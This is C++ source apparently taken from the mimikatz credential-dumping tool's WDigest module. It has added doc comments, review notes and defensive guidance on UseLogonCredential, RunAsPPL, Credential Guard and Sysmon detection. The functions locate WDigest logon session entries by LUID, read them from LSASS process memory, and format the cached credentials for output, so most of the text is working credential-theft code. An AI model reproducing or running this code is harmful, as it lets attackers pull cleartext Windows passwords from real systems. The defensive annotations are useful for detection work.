/**
 * @brief Builds a short diagnostic report about the WDigest lookup and sends it to the caller.
 *
 * The report holds the "Research Status" verdict returned by searchWDigestEntryList(),
 * followed by the current values of l_LogSessList and
 * SeckPkgFunctionTable->LsaUnprotectMemory as the stream prints them.
 *
 * @param monPipe      Pipe the report text is written to through sendTo().
 * @param mesArguments Not read by this function.
 * @return Whatever sendTo() returns for the report.
 *
 * NOTE(review): __kextdll presumably marks an entry point exported by an extension DLL;
 * confirm against the macro definition.
 * NOTE(review): SeckPkgFunctionTable is dereferenced without a null check, even when the
 * lookup reports "KO"; confirm it is always initialised before this command can run.
 *
 * Defender note: cleartext WDigest credentials are only cached when the WDigest
 * UseLogonCredential registry value enables it; keeping it at 0 and enabling LSA
 * protection (RunAsPPL) or Credential Guard reduces what a lookup like this can reach.
 */
__kextdll bool __cdecl getWDigestFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments)
{
    wostringstream report;

    // One insertion per statement, so the order of the lookup and the reads is explicit.
    report << L"** wdigest.dll/lsasrv.dll ** ; Research Status : ";

    const wchar_t * verdict = searchWDigestEntryList() ? L"OK :)" : L"KO :(";
    report << verdict << endl << endl;

    report << L"@l_LogSessList = " << l_LogSessList << endl;
    report << L"@LsaUnprotectMemory = " << SeckPkgFunctionTable->LsaUnprotectMemory << endl;

    return sendTo(monPipe, report.str());
}
/**
 * @brief Formats the WDigest credential entry of one logon session and sends it over the pipe.
 *
 * When searchWDigestEntryList() fails, the reply is the fixed text "n.a. (wdigest KO)".
 * Otherwise the session list rooted at l_LogSessList is searched for the entry whose
 * LocallyUniqueIdentifier field matches logId. The credential pointer is the entry address
 * plus offsetWDigestPrimary. It stays NULL when no entry matches, and
 * genericCredsToStream() is called in both cases.
 *
 * @param logId        LUID of the logon session to look up.
 * @param monPipe      Pipe the reply text is written to through sendTo().
 * @param justSecurity Passed through unchanged to genericCredsToStream().
 * @return Whatever sendTo() returns for the reply.
 *
 * NOTE(review): the list entry is used as a directly addressable pointer, so this variant
 * presumably runs inside the process that owns the list; confirm against the caller.
 *
 * Defender note: LSA protection (RunAsPPL) restricts which modules can load into LSASS, and
 * a WDigest UseLogonCredential value of 0 keeps cleartext passwords out of this cache.
 */
bool WINAPI getWDigestLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity)
{
    wostringstream reply;

    // Guard clause: nothing to format when the WDigest structures were not located.
    if(!searchWDigestEntryList())
    {
        reply << L"n.a. (wdigest KO)";
        return sendTo(monPipe, reply.str());
    }

    PKIWI_GENERIC_PRIMARY_CREDENTIAL creds = NULL;

    PKIWI_WDIGEST_LIST_ENTRY sessionEntry = reinterpret_cast<PKIWI_WDIGEST_LIST_ENTRY>(
        getPtrFromLinkedListByLuid(
            reinterpret_cast<PLIST_ENTRY>(l_LogSessList),
            FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier),
            logId));

    if(sessionEntry)
    {
        // The credential block sits offsetWDigestPrimary bytes into the list entry.
        PBYTE entryBase = reinterpret_cast<PBYTE>(sessionEntry);
        creds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(entryBase + offsetWDigestPrimary);
    }

    // Called even when creds is NULL, as in the original flow.
    genericCredsToStream(&reply, creds, justSecurity);

    return sendTo(monPipe, reply.str());
}
/**
 * @brief Copies one session's WDigest list entry into a local buffer and formats its credentials.
 *
 * When searchWDigestEntryList() fails, "n.a. (wdigest KO)" is written to *outputStream.
 * Otherwise a buffer of offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL)
 * bytes is allocated and the list rooted at l_LogSessList is searched for the entry whose
 * LocallyUniqueIdentifier matches logId. If an entry is found, mod_memory::readMemory() is
 * asked to copy it into the buffer using mod_mimikatz_sekurlsa::hLSASS. The credential
 * pointer handed to genericCredsToStream() points into that local copy, or is NULL when the
 * lookup or the read failed.
 *
 * @param logId        LUID of the logon session to look up.
 * @param justSecurity Passed through unchanged to genericCredsToStream().
 * @return Always true.
 *
 * NOTE(review): hLSASS is presumably a handle to the LSASS process opened with read access,
 * which would make this a cross-process read; confirm where the handle is opened.
 * NOTE(review): the buffer is freed only on the normal path. If genericCredsToStream() can
 * throw, the buffer leaks; it is also released without being cleared.
 *
 * Defender note: reads of this kind need a handle to LSASS with memory-read rights, so
 * process-access telemetry on lsass.exe (for example Sysmon event ID 10) is a useful
 * detection point. RunAsPPL and Credential Guard limit what such a handle can obtain.
 */
bool WINAPI mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData(__in PLUID logId, __in bool justSecurity)
{
    // Guard clause: report the failed lookup and stop.
    if(!searchWDigestEntryList())
    {
        (*outputStream) << L"n.a. (wdigest KO)";
        return true;
    }

    PKIWI_GENERIC_PRIMARY_CREDENTIAL creds = NULL;

    // Enough room for the entry prefix plus the credential block that follows it.
    DWORD copySize = offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL);
    BYTE * localCopy = new BYTE[copySize];

    PLIST_ENTRY sessionEntry = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(
        reinterpret_cast<PLIST_ENTRY>(l_LogSessList),
        FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier),
        logId);

    // Short-circuit keeps the read from running when no entry matched.
    if(sessionEntry && mod_memory::readMemory(sessionEntry, localCopy, copySize, mod_mimikatz_sekurlsa::hLSASS))
    {
        creds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(localCopy + offsetWDigestPrimary);
    }

    // creds points into localCopy, so the buffer must stay alive until formatting is done.
    mod_mimikatz_sekurlsa::genericCredsToStream(creds, justSecurity);
    delete [] localCopy;

    return true;
}